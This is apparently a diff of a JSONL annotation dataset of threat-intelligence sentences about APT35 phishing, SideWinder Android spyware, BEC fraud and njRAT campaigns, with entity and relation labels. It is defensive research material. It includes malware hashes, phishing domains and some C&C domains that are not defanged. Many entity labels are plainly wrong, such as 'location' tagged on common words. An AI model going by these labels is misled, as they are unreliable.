Backdoor.Win64.BIOPASS.A d18d84d32a340d20ab07a36f9e4b959495ecd88d7b0e9799399fcc4e959f536b flash_installer.exe","entities":[{"id":10305,"label":"malware","start_offset":0,"end_offset":11},{"id":10306,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49106,"label":"malware","start_offset":20,"end_offset":44},{"id":49107,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":709,"from_id":10305,"to_id":49106,"type":"duplicate-of"},{"id":711,"from_id":10306,"to_id":49106,"type":"indicates"},{"id":710,"from_id":49107,"to_id":10306,"type":"duplicate-of"},{"id":712,"from_id":49107,"to_id":49106,"type":"indicates"}],"Comments":[]} +{"id":3638,"text":"When he finds one that is still in progress, he crafts a malicious attack email that seems to be relevant to the ongoing email conversation and sends it to Bob as shown in the bottom figure.","entities":[],"relations":[],"Comments":[]} +{"id":10530,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":4391,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50204,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":13574,"text":"The first way involves appending a fake login form to the page.","entities":[],"relations":[],"Comments":[]} +{"id":14149,"text":"Moving to more targeted attack methods appears to be a mainstay among threat actors, which requires organizations to improve their visibility into the entire attack lifecycle.","entities":[],"relations":[],"Comments":[]} +{"id":1136,"text":"The evasive nature of this malware family leads to a different file hash, import hash, and only a 20% average SSDeep hash overlap between the samples.","entities":[{"id":46571,"label":"tools","start_offset":110,"end_offset":116}],"relations":[],"Comments":[]} +{"id":10033,"text":"As of this writing, our telemetry has detected infection attempts in China.","entities":[],"relations":[],"Comments":[]} +{"id":9208,"text":"The JBS cyber attack comes just three weeks after Colonial Pipeline, the US's largest pipeline system, was targeted in a ransomware attack.","entities":[],"relations":[],"Comments":[]} +{"id":3295,"text":"3. \u201cnoreturn\u201d: executes a system command using the Python function \u201cwin32api.ShellExecute\u201d without waiting for the result.","entities":[{"id":48383,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} +{"id":3577,"text":"When ConfuserEx performs its obfuscation routine, one of the operations creates a watermark \u2013 a unique identifier within the software--that is present in the final binary.","entities":[{"id":49362,"label":"tools","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} +{"id":13816,"text":"The API hooking on \u201cZwOpenProcess\u201d will only be triggered if \"%temp%\\KERNELBASE.dll\" exists on the host.","entities":[{"id":42857,"label":"attack-pattern","start_offset":8,"end_offset":15},{"id":42858,"label":"location","start_offset":35,"end_offset":39},{"id":42859,"label":"location","start_offset":40,"end_offset":44},{"id":42860,"label":"location","start_offset":99,"end_offset":103}],"relations":[],"Comments":[]} +{"id":4621,"text":"RCA Diagrams: Fig. Executing commands using Chopper CnC Conclusion","entities":[],"relations":[],"Comments":[]} +{"id":2088,"text":"This threat actor has done little to hide malicious activity, and is probably going to continue this behavior.","entities":[],"relations":[],"Comments":[]} +{"id":11470,"text":"Any one government\u2019s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[{"id":35061,"label":"location","start_offset":45,"end_offset":51},{"id":35062,"label":"location","start_offset":57,"end_offset":63},{"id":35063,"label":"location","start_offset":76,"end_offset":80},{"id":35064,"label":"location","start_offset":101,"end_offset":114},{"id":35065,"label":"location","start_offset":115,"end_offset":121},{"id":35066,"label":"location","start_offset":122,"end_offset":125},{"id":35067,"label":"tools","start_offset":154,"end_offset":160}],"relations":[],"Comments":[]} +{"id":14132,"text":"No months are plotted, so this figure is like compressing all the activity across the full 2020-year in one day just to show the active hours in a day.","entities":[{"id":48195,"label":"TIME","start_offset":91,"end_offset":100}],"relations":[],"Comments":[]} +{"id":13309,"text":"The vulnerabilities that Tropic Trooper\u2019s campaigns have been patched last January, for instance.","entities":[],"relations":[],"Comments":[]} +{"id":11582,"text":"It contains a generic privilege escalation exploit wrapper which is used by six different exploits.","entities":[{"id":35519,"label":"attack-pattern","start_offset":22,"end_offset":42}],"relations":[],"Comments":[]} +{"id":3304,"text":"Depending on the different argument \u201ctype\u201d delivered with the command, it performs different behaviors.","entities":[],"relations":[],"Comments":[]} +{"id":2013,"text":"For example, LockBit 2.0 leverages Tox Chat for threat actor communications.","entities":[{"id":45221,"label":"malware","start_offset":13,"end_offset":24},{"id":45222,"label":"tools","start_offset":35,"end_offset":43}],"relations":[{"id":89,"from_id":45221,"to_id":45222,"type":"uses"}],"Comments":[]} +{"id":5281,"text":"This report discusses the technical capabilities of this Cyclops Blink malware variant and includes a list of more than 150 current and historical command-and-control (C&C) servers of the Cyclops Blink botnet.","entities":[{"id":51328,"label":"malware","start_offset":57,"end_offset":70},{"id":51329,"label":"malware","start_offset":188,"end_offset":201}],"relations":[],"Comments":[]} +{"id":4195,"text":"Signed Binary Proxy Execution: Rundll32 T1036.005","entities":[{"id":49999,"label":"attack-pattern","start_offset":0,"end_offset":49}],"relations":[],"Comments":[]} +{"id":1772,"text":"The three vulnerabilities each contain code to alter a user-controlled address, and the code can be distilled down to the following operations:","entities":[],"relations":[],"Comments":[]} +{"id":3003,"text":"It\u2019s the apps you use to view content.","entities":[],"relations":[],"Comments":[]} {"id":8005,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":24834,"label":"attack-pattern","start_offset":5,"end_offset":11},{"id":24836,"label":"location","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} -{"id":8009,"text":"A few were observed displaying a fake error message requiring user click-through to continue execution.","entities":[],"relations":[],"Comments":[]} -{"id":8013,"text":"On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.","entities":[],"relations":[],"Comments":[]} -{"id":8017,"text":"Our recommendations: Additional resources: Avoid & Report Phishing Emails.","entities":[{"id":24864,"label":"attack-pattern","start_offset":58,"end_offset":66}],"relations":[],"Comments":[]} -{"id":8018,"text":"Related Malware hashes: Top Phishing Domains:","entities":[{"id":24865,"label":"attack-pattern","start_offset":28,"end_offset":36}],"relations":[],"Comments":[]} -{"id":8020,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":24868,"label":"location","start_offset":10,"end_offset":14},{"id":24869,"label":"location","start_offset":89,"end_offset":95},{"id":24870,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} -{"id":8024,"text":"On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[],"relations":[],"Comments":[]} -{"id":8026,"text":"In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":24889,"label":"location","start_offset":37,"end_offset":41},{"id":24893,"label":"attack-pattern","start_offset":181,"end_offset":189}],"relations":[],"Comments":[]} -{"id":8029,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":24903,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":24905,"label":"location","start_offset":64,"end_offset":74},{"id":24906,"label":"location","start_offset":78,"end_offset":82},{"id":24907,"label":"attack-pattern","start_offset":85,"end_offset":93}],"relations":[],"Comments":[]} -{"id":8031,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} -{"id":8032,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":24913,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":24914,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} -{"id":8033,"text":"APT35 has relied on this technique since 2017 — targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":24916,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":24918,"label":"location","start_offset":93,"end_offset":101},{"id":24920,"label":"location","start_offset":137,"end_offset":140},{"id":24921,"label":"location","start_offset":141,"end_offset":149},{"id":24922,"label":"location","start_offset":150,"end_offset":158}],"relations":[],"Comments":[]} -{"id":8034,"text":"Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – as they know it's difficult for users to detect this kind of attack.","entities":[{"id":24923,"label":"attack-pattern","start_offset":11,"end_offset":19},{"id":24924,"label":"location","start_offset":79,"end_offset":83}],"relations":[],"Comments":[]} -{"id":8035,"text":"In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store.","entities":[],"relations":[],"Comments":[]} -{"id":8038,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":24935,"label":"location","start_offset":45,"end_offset":48},{"id":24936,"label":"threat-actor","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} -{"id":8039,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":24939,"label":"location","start_offset":11,"end_offset":15},{"id":24941,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} -{"id":8041,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":24947,"label":"location","start_offset":30,"end_offset":34},{"id":24948,"label":"attack-pattern","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} -{"id":8042,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[{"id":24950,"label":"location","start_offset":71,"end_offset":78},{"id":24951,"label":"attack-pattern","start_offset":84,"end_offset":92}],"relations":[],"Comments":[]} -{"id":8046,"text":"One of APT35’s novel techniques involves using Telegram for operator notifications.","entities":[],"relations":[],"Comments":[]} -{"id":8047,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[{"id":24968,"label":"attack-pattern","start_offset":36,"end_offset":44},{"id":24969,"label":"location","start_offset":63,"end_offset":67},{"id":24970,"label":"location","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} -{"id":8049,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[{"id":24974,"label":"location","start_offset":83,"end_offset":86},{"id":24975,"label":"location","start_offset":126,"end_offset":129},{"id":24976,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":24977,"label":"location","start_offset":168,"end_offset":173},{"id":24978,"label":"location","start_offset":177,"end_offset":181},{"id":24979,"label":"location","start_offset":182,"end_offset":186}],"relations":[],"Comments":[]} -{"id":8051,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":24983,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":24984,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} -{"id":8058,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[],"relations":[],"Comments":[]} -{"id":8060,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf ","entities":[{"id":25012,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":25013,"label":"attack-pattern","start_offset":22,"end_offset":30},{"id":25014,"label":"location","start_offset":31,"end_offset":39},{"id":25015,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":25016,"label":"URL","start_offset":229,"end_offset":255},{"id":25017,"label":"location","start_offset":256,"end_offset":260},{"id":25018,"label":"URL","start_offset":292,"end_offset":318},{"id":25019,"label":"location","start_offset":319,"end_offset":323},{"id":25020,"label":"URL","start_offset":340,"end_offset":366},{"id":25021,"label":"location","start_offset":367,"end_offset":371},{"id":25022,"label":"malware","start_offset":410,"end_offset":417},{"id":25023,"label":"URL","start_offset":430,"end_offset":455}],"relations":[],"Comments":[]} -{"id":8061,"text":"Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":25024,"label":"attack-pattern","start_offset":0,"end_offset":8},{"id":25025,"label":"location","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} -{"id":8062,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[],"relations":[],"Comments":[]} -{"id":8064,"text":"Understanding the techniques used by attackers helps us counter these threats effectively.","entities":[],"relations":[],"Comments":[]} -{"id":8069,"text":"We believe this is a technique the attacker is using to evade detection rules.","entities":[],"relations":[],"Comments":[]} -{"id":8070,"text":"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer.","entities":[],"relations":[],"Comments":[]} -{"id":8075,"text":"Since mid-August, OpenSUpdater samples have carried an invalid signature, and further investigation showed this was a deliberate attempt to evade detection.","entities":[{"id":25056,"label":"malware","start_offset":18,"end_offset":30},{"id":25057,"label":"location","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} -{"id":8078,"text":"Bytes: 30 0D 06 09 2A 86 48 86 F7 0D 01 01 0B 00 00","entities":[],"relations":[],"Comments":[]} -{"id":8082,"text":"As shown in the following screenshot, the signature is considered to be valid by the Windows operating system.","entities":[],"relations":[],"Comments":[]} -{"id":8084,"text":"Since first discovering this activity, OpenSUpdater's authors have tried other variations on invalid encodings to further evade detection.","entities":[{"id":25069,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} -{"id":8085,"text":"The following are samples using this evasion: https:\/\/www.virustotal.com\/gui\/file\/5094028a0afb4d4a3d8fa82b613c0e59d31450d6c75ed96ded02be1e9db8104f\/detection New variant: https:\/\/www.virustotal.com\/gui\/file\/5c0ff7b23457078c9d0cbe186f1d05bfd573eb555baa1bf4a45e1b79c8c575db\/detection","entities":[{"id":25070,"label":"location","start_offset":14,"end_offset":17},{"id":25071,"label":"SHA1","start_offset":46,"end_offset":156},{"id":25072,"label":"URL","start_offset":170,"end_offset":280}],"relations":[],"Comments":[]} -{"id":8088,"text":"Updated January 8, 2020 5PM EST with a video showing the exploit of CVE-2019-2215.","entities":[{"id":25080,"label":"TIME","start_offset":24,"end_offset":31},{"id":25081,"label":"location","start_offset":78,"end_offset":82}],"relations":[],"Comments":[]} -{"id":8090,"text":"One of these apps, called Camero, exploits CVE-2019-2215, a vulnerability that exists in Binder (the main Inter-Process Communication system in Android).","entities":[{"id":25087,"label":"location","start_offset":52,"end_offset":56},{"id":25088,"label":"malware","start_offset":106,"end_offset":111}],"relations":[],"Comments":[]} -{"id":8091,"text":"This is the first known active attack in the wild that uses the use-after-free vulnerability.","entities":[],"relations":[],"Comments":[]} -{"id":8095,"text":"We speculate that these apps have been active since March 2019 based on the certificate information on one of the apps.","entities":[],"relations":[],"Comments":[]} -{"id":8096,"text":"The apps have since been removed from Google Play.","entities":[],"relations":[],"Comments":[]} -{"id":8097,"text":" Figure 1. The three apps related to SideWinder group Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":8098,"text":"Certificate information of one of the apps Installation SideWinder installs the payload app in two stages.","entities":[],"relations":[],"Comments":[]} -{"id":8100,"text":"We found that the group employs Apps Conversion Tracking to configure the C&C server address.","entities":[],"relations":[],"Comments":[]} -{"id":8101,"text":"The address was encoded by Base64 then set to referrer parameter in the URL used in the distribution of the malware.","entities":[],"relations":[],"Comments":[]} -{"id":8102,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":8103,"text":"Parsed C&C Server address","entities":[],"relations":[],"Comments":[]} -{"id":8105,"text":"All of this is done without user awareness or intervention.","entities":[],"relations":[],"Comments":[]} -{"id":8108,"text":"After downloading the extra DEX file from the C&C server, the second-layer droppers invoke extra code to download, install, and launch the callCam app on the device.","entities":[{"id":25120,"label":"location","start_offset":124,"end_offset":127},{"id":25121,"label":"malware","start_offset":139,"end_offset":146}],"relations":[],"Comments":[]} -{"id":8109,"text":" Figure 4. Two-stage payload deployment Figure 5. Code showing how the dropper invokes extra DEX code To deploy the payload app callCam on the device without the user’s awareness","entities":[{"id":25125,"label":"malware","start_offset":129,"end_offset":136}],"relations":[],"Comments":[]} -{"id":8110,"text":", SideWinder does the following: 1. Device Rooting This approach is done by the dropper app Camero and only works on Google Pixel (Pixel 2, Pixel 2 XL), Nokia 3 (TA-1032), LG V20 (LG-H990), Oppo F9 (CPH1881), and Redmi 6A devices.","entities":[{"id":25126,"label":"threat-actor","start_offset":2,"end_offset":12},{"id":25129,"label":"location","start_offset":101,"end_offset":104},{"id":25130,"label":"location","start_offset":105,"end_offset":109},{"id":25142,"label":"location","start_offset":211,"end_offset":214}],"relations":[],"Comments":[]} -{"id":8111,"text":"The malware retrieves a specific exploit from the C&C server depending on the DEX downloaded by the dropper.","entities":[],"relations":[],"Comments":[]} -{"id":8112,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":8113,"text":"Code snippet from Extra DEX downloaded by Camero","entities":[],"relations":[],"Comments":[]} -{"id":8114,"text":"We were able to download five exploits from the C&C server during our investigation.","entities":[],"relations":[],"Comments":[]} -{"id":8117,"text":"MediaTek-SU exploit","entities":[],"relations":[],"Comments":[]} -{"id":8118,"text":"After acquiring root privilege, the malware installs the app callCam, enables its accessibility permission, and then launches it. Figure 9.","entities":[{"id":25154,"label":"location","start_offset":16,"end_offset":20},{"id":25155,"label":"malware","start_offset":61,"end_offset":68},{"id":25156,"label":"location","start_offset":108,"end_offset":111}],"relations":[],"Comments":[]} -{"id":8119,"text":"Commands","entities":[],"relations":[],"Comments":[]} -{"id":8122,"text":"After its launch, the app asks the user to enable accessibility.","entities":[],"relations":[],"Comments":[]} -{"id":8123,"text":" Figure 10. Steps FileCrypt Manager prompts user to do","entities":[],"relations":[],"Comments":[]} -{"id":8124,"text":"Once granted, the app shows a full screen window that says that it requires further setup steps.","entities":[],"relations":[],"Comments":[]} -{"id":8125,"text":"In reality, that is just an overlay screen that is displayed on top of all activity windows on the device.","entities":[{"id":25165,"label":"identity","start_offset":20,"end_offset":24}],"relations":[],"Comments":[]} -{"id":8127,"text":"Overlay screen","entities":[],"relations":[],"Comments":[]} -{"id":8128,"text":"Meanwhile, the app invokes code from the extra DEX file to enable the installation of unknown apps and the installation of the payload app callCam.","entities":[{"id":25169,"label":"location","start_offset":99,"end_offset":102},{"id":25170,"label":"malware","start_offset":139,"end_offset":146}],"relations":[],"Comments":[]} -{"id":8130,"text":"All of this happens behind the overlay screen, unbeknownst to the user.","entities":[],"relations":[],"Comments":[]} -{"id":8133,"text":"Code enable accessibility permission of the newly installed app","entities":[],"relations":[],"Comments":[]} -{"id":8135,"text":" &amp;amp;amp;amp;nbsp; callCam’s Activities","entities":[{"id":25178,"label":"malware","start_offset":31,"end_offset":38}],"relations":[],"Comments":[]} -{"id":8136,"text":"The app callCam hides its icon on the device after being launched.","entities":[],"relations":[],"Comments":[]} -{"id":8138,"text":"Sensor information Camera information Screenshot Account Wifi information","entities":[],"relations":[],"Comments":[]} -{"id":8139,"text":"Data of WeChat, Outlook, Twitter, Yahoo Mail, Facebook, Gmail, and Chrome The app encrypts all stolen data using RSA and AES encryption algorithms.","entities":[{"id":25188,"label":"location","start_offset":63,"end_offset":66},{"id":25190,"label":"identity","start_offset":114,"end_offset":117},{"id":25191,"label":"location","start_offset":118,"end_offset":121}],"relations":[],"Comments":[]} -{"id":8141,"text":"When encrypting, it creates a block of data we named headData.","entities":[],"relations":[],"Comments":[]} -{"id":8142,"text":"This block contains the first 9 bytes of origin data, origin data length, random AES IV, the RSA-encrypted AES encrypt key, and the SHA256 value of AES-encrypted origin data.","entities":[{"id":25194,"label":"identity","start_offset":93,"end_offset":96},{"id":25195,"label":"location","start_offset":124,"end_offset":127}],"relations":[],"Comments":[]} -{"id":8143,"text":"Then the headData is encoded through the customized routine.","entities":[],"relations":[],"Comments":[]} -{"id":8144,"text":"After the encoding, it is stored in the head of the final encrypted file followed by the data of the AES-encrypted original data.","entities":[],"relations":[],"Comments":[]} -{"id":8145,"text":" Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":8146,"text":"Data encryption process Figure 15.","entities":[],"relations":[],"Comments":[]} -{"id":8147,"text":"Customized encoding routine done Relation to SideWinder","entities":[],"relations":[],"Comments":[]} -{"id":8149,"text":"In addition, a URL linking to one of the apps’ Google Play pages is also found on one of the C&C servers.","entities":[],"relations":[],"Comments":[]} -{"id":8150,"text":" Figure 16.","entities":[],"relations":[],"Comments":[]} -{"id":8151,"text":"Google Play URL of FileManager app found in one of the C&C servers.","entities":[],"relations":[],"Comments":[]} -{"id":8156,"text":"Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies to protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerabilities. Indicators of Compromise SHA256 Package Name\/File type App Name\/Detection Name ec4d6bf06dd3f94f4555d75c6daaf540dee15b18d62cc004e774e996c703cb34 DEX AndroidOS_SWinderSpy.HRXA a60fc4e5328dc75dad238d46a2867ef7207b8c6fb73e8bd001b323b16f02ba00 DEX AndroidOS_SWinderSpy.HRXA","entities":[{"id":25233,"label":"location","start_offset":14,"end_offset":20},{"id":25234,"label":"location","start_offset":45,"end_offset":49},{"id":25235,"label":"location","start_offset":66,"end_offset":69},{"id":25236,"label":"location","start_offset":104,"end_offset":107},{"id":25238,"label":"location","start_offset":181,"end_offset":184},{"id":25239,"label":"location","start_offset":216,"end_offset":219},{"id":25240,"label":"location","start_offset":306,"end_offset":310},{"id":25241,"label":"SHA1","start_offset":335,"end_offset":399},{"id":25242,"label":"SHA2","start_offset":430,"end_offset":494}],"relations":[],"Comments":[]} -{"id":8157,"text":"0daefb3d05e4455b590da122255121079e83d48763509b0688e0079ab5d48886","entities":[{"id":25243,"label":"SHA1","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} -{"id":8158,"text":"ELF AndroidOS_MtkSu.A 441d98dff3919ed24af7699be658d06ae8dfd6a12e4129a385754e6218bc24fa ELF AndroidOS_BinderExp.A ac82f7e4831907972465477eebafc5a488c6bb4d460575cd3889226c390ef8d5 ELF AndroidOS_BinderExp.A ee679afb897213a3fd09be43806a7e5263563e86ad255fd500562918205226b8 ELF AndroidOS_BinderExp.A 135cb239966835fefbb346165b140f584848c00c4b6a724ce122de7d999a3251 ELF","entities":[{"id":25244,"label":"MD5","start_offset":22,"end_offset":86},{"id":25245,"label":"SHA1","start_offset":113,"end_offset":177},{"id":25246,"label":"SHA1","start_offset":204,"end_offset":268},{"id":25247,"label":"SHA1","start_offset":295,"end_offset":359}],"relations":[],"Comments":[]} -{"id":8159,"text":"AndroidOS_MtkSu.A a265c32ed1ad47370d56cbd287066896d6a0c46c80a0d9573d2bb915d198ae42 com.callCam.android.callCam2base callCamm","entities":[{"id":25248,"label":"SHA2","start_offset":18,"end_offset":82}],"relations":[],"Comments":[]} -{"id":8161,"text":"FileCrypt Manager com.callCam.android.callCam2base callCamm com.camero.android.camera2basic Camero","entities":[],"relations":[],"Comments":[]} -{"id":8162,"text":" C&C Servers ms-ethics.net","entities":[],"relations":[],"Comments":[]} -{"id":8163,"text":" deb-cn.net ap1-acl.net m s-db.net","entities":[],"relations":[],"Comments":[]} -{"id":8170,"text":" Figure 1. Diagram showing how the BEC scam is carried out Background","entities":[],"relations":[],"Comments":[]} -{"id":8177,"text":"Thank you for your understanding.","entities":[],"relations":[],"Comments":[]} -{"id":8179,"text":" The email contained two PDF file attachments.","entities":[],"relations":[],"Comments":[]} -{"id":8181,"text":" Figure 3. Letter confirming the changes in the company’s bank reference.","entities":[],"relations":[],"Comments":[]} -{"id":8183,"text":" Meanwhile, the second PDF file shows the banking account reference number: Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":8186,"text":"Initial investigation ","entities":[],"relations":[],"Comments":[]} -{"id":8191,"text":"A perceptive employee could potentially identify this as something unusual, which raises red flags.","entities":[],"relations":[],"Comments":[]} -{"id":8193,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":8194,"text":"The PDF file showing the banking account reference.","entities":[],"relations":[],"Comments":[]} -{"id":8196,"text":" We investigated the name shown on the account but did not find any useful information other than the fact that this name is used mostly in the Ivory Coast in Africa.","entities":[],"relations":[],"Comments":[]} -{"id":8199,"text":"Table 1. Domains registered using the email address ","entities":[],"relations":[],"Comments":[]} -{"id":8206,"text":" This is BEC as we usually know it.","entities":[],"relations":[],"Comments":[]} -{"id":8210,"text":"A little over two weeks before the registration of the fake domain, the attackers sent the following email to the company: Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":8211,"text":"The initial email sent by the malicious actors, allegedly from the General Directorate of Public Finances (DGFiP) of France, concerning tax inquiries The email contained an attached PDF file that seemed to be a letter from the French Tax service: Figure 7.","entities":[],"relations":[],"Comments":[]} -{"id":8217,"text":"While thanking you for your cooperation, please believe in the assurance of my distinguished feelings.","entities":[],"relations":[],"Comments":[]} -{"id":8223,"text":" The use of tax-related scams is something we’ve seen before.","entities":[],"relations":[],"Comments":[]} -{"id":8231,"text":"We also helped close the fraudulent domains.","entities":[],"relations":[],"Comments":[]} -{"id":8234,"text":"As such, here are some tips on how to stay safe from these online schemes: Carefully scrutinize all emails.","entities":[{"id":25443,"label":"location","start_offset":14,"end_offset":17},{"id":25444,"label":"threat-actor","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} -{"id":8237,"text":"Raise employee awareness.","entities":[],"relations":[],"Comments":[]} -{"id":8242,"text":"Always verify requests.","entities":[],"relations":[],"Comments":[]} -{"id":8247,"text":"Indicators of Compromise (IoCs) Domains dgfip-finances-gouv[.]cloud bellingstudio@gmail.com Tags","entities":[{"id":25473,"label":"EMAIL","start_offset":70,"end_offset":93}],"relations":[],"Comments":[]} -{"id":8253,"text":"This highlights how the cybercrime underground in the Middle East\/North African region (covered in our paper titled Digital Souks: A Glimpse into the Middle Eastern and North African Underground) can expand their activity into areas beyond their original area of expertise.","entities":[{"id":25484,"label":"location","start_offset":80,"end_offset":86},{"id":25486,"label":"location","start_offset":196,"end_offset":199},{"id":25487,"label":"malware","start_offset":200,"end_offset":206}],"relations":[],"Comments":[]} -{"id":8254,"text":"DiscoveryOur first inkling of this threat came when we spotted a spear-phishing email campaign targeting several embassies of various European countries.","entities":[{"id":25489,"label":"location","start_offset":65,"end_offset":70},{"id":25490,"label":"attack-pattern","start_offset":71,"end_offset":79},{"id":25491,"label":"location","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} -{"id":8257,"text":"Once the multiple layers of script obfuscation are removed, the final payload arrives—a version of the njRAT Trojan; this family has been a known threat since 2015.","entities":[{"id":25496,"label":"location","start_offset":47,"end_offset":50},{"id":25497,"label":"malware","start_offset":103,"end_offset":108}],"relations":[],"Comments":[]} -{"id":8258,"text":"The obfuscation used was not particularly sophisticated.","entities":[],"relations":[],"Comments":[]} -{"id":8261,"text":"We believe that this specific VBS obfuscation script was created by the N7r team, a North African hacking group known for making video tutorials on using common RATs (that this particular script wasn’t part of any such videos).","entities":[],"relations":[],"Comments":[]} -{"id":8265,"text":"The new emails used more common phishing tactics, such as alleged requests for payment confirmation.","entities":[{"id":25515,"label":"attack-pattern","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} -{"id":8266,"text":"At least one message was sent to a diplomat based in the island of Saint Martin after Hurricane Irma hit.","entities":[{"id":25517,"label":"location","start_offset":35,"end_offset":43},{"id":25518,"label":"location","start_offset":57,"end_offset":63},{"id":25521,"label":"identity","start_offset":101,"end_offset":104}],"relations":[],"Comments":[]} -{"id":8268,"text":"The attachments used in this second wave was more sophisticated, but barely so.","entities":[],"relations":[],"Comments":[]} -{"id":8270,"text":"The payload was still njRAT.","entities":[{"id":25528,"label":"malware","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} -{"id":8274,"text":"These Yara rules allowed us to find other samples, which delivered other basic RATs like H-Worm, Luminosity, and RemCOS.","entities":[{"id":25536,"label":"location","start_offset":109,"end_offset":112},{"id":25537,"label":"malware","start_offset":113,"end_offset":119}],"relations":[],"Comments":[]} -{"id":8276,"text":"Some of these domains were also tied to banking malware, confirming our attacker was not limited to embassies.","entities":[],"relations":[],"Comments":[]} -{"id":8277,"text":"OPSEC 101 – Or How Not To Do OPSECGathering the above information was enough to protect our customers.","entities":[],"relations":[],"Comments":[]} -{"id":8279,"text":"The attacker almost always sent his mails from a Libyan IP address.","entities":[],"relations":[],"Comments":[]} -{"id":8280,"text":"In some cases, compromised SMTP servers belonging to the hotels he had breached were used.","entities":[],"relations":[],"Comments":[]} -{"id":8281,"text":"He didn’t bother using services which hid his IP addresses from mail headers, which allowed us to correlate these addresses to a dynamic DNS domain used by the attacker.","entities":[],"relations":[],"Comments":[]} -{"id":8282,"text":"We also checked the registrant data of the domains used by the attacker.","entities":[],"relations":[],"Comments":[]} -{"id":8283,"text":"This information was exceptionally useful, as it allowed us to find multiple Facebook accounts controlled by the threat actor.","entities":[],"relations":[],"Comments":[]} -{"id":8284,"text":"We then confirmed his location (Libya) as well as his probable identity.","entities":[],"relations":[],"Comments":[]} -{"id":8286,"text":" Figure 1. Stolen document posted on Facebook (Click to enlarge)","entities":[],"relations":[],"Comments":[]} -{"id":8287,"text":"He didn't just post embassy documents on Facebook: he also posted stolen credit cards and screens of defaced 